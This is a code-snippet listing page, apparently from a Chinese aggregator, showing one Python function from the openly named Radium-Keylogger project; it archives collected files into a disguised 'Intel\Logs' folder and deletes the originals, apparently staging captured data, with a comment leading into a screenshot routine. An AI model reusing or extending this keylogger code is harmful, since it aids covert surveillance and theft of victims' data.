Radiumkeylogger.py 文件源码

python
阅读 35 收藏 0 点赞 0 评论 0

项目:Radium-Keylogger 作者: mehulj94 项目源码 文件源码
def ZipAttachments(f_name):
    arch_name = "C:\Users\Public\Intel\Logs\\" + f_name + "Attachments"
    files = os.listdir(dir_zip)

    try:
        shutil.make_archive(arch_name, 'zip', dir_zip)
    except Exception as e:
        pass

    for j in range(len(files)):
        try:
            os.remove(dir_zip + "\\" + files[j])
        except Exception as e:
            print e

#Function to take screenshot
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号